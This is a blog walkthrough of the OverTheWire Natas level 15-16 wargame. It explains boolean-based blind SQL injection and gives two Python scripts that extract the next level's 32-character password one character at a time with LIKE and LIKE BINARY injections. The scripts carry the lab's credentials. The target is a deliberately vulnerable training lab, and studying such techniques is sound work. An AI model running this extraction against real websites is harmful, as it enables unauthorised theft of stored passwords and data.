OVERTHEWIRE NATAS SERIES: 15 – 16 LEVEL Walkthrough

If you want to see the level 14- 15, follow this link: http://www.anonhack.in/2018/09/overthewire-natas-series-14-15-levels/

Level 15-16 is also based on SQL injection but here we have to work on boolean based SQL injection technique. Let me how you how:

This is what the screen looks like:

I put “natas16” as the user here and it turns out the user exist.

If you check the source code here, you will find how the query looks like.
The highlighted part is what the query looks like. In such case we can pull out boolean based because the query takes input in the where clause.

So I tried doing this: natas16″ AND password LIKE ‘%3%’ “

The query now looks like this: SELECT * FROM USERS WHERE USERNAME=”natas16″ AND PASSWORD LIKE ‘%3%’ “

LIKE here checks if the wildcard character 3 exist anywhere in the password or not. So I got it working easily now.

What we need to create is a small script so that we can brute force 32 character long passcode which contains uppercase,lowercase and 0-9 digits for level 16 of natas. The script that I created is here:

import requests

url='http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/index.php'
passchar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXVZ1234567890'
bstr='This user exist'.encode('utf-8')
password=''

for i in range(32):
	for j in passchar:
		req = requests.get(url+'?username=natas16" AND password LIKE "' + password + j + '%" "')
		if req.content.find(bstr) != -1:
			password += j
			print('Password: ' + password)
			break

The above script was working just fine, but there was a little problem. It gave me all 32 characters in small letters. This is because the LIKE operator does not care for uppercase or lowercase. It simply checks the letter and if it exist it prints in out.

To get rid of this all we need to do is add binary keyword with the LIKE in the code:

import requests

url='http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/index.php'
passchar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXVZ1234567890'
bstr='This user exist'.encode('utf-8')
password=''

for i in range(32):
	for j in passchar:
		req = requests.get(url+'?username=natas16" AND password LIKE BINARY "' + password + j + '%" "')
		if req.content.find(bstr) != -1:
			password += j
			print('Password: ' + password)
			break

BINARY makes LIKE wildcards case sensitive, so it gave the the exact password.
Now, if you run the code, you will find the password for the next level.

 

P.S:

A little about the code above:
LIKE BINARY ‘%3%’ – check for the number 3 in any place in the password.
but if I want to search the first character my LIKE wildcard will look soemthing like: LIKE BINARY ‘3%’ – simply means I am checking that 3 is the first letter and percentage sign denoted there are characters after 3.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.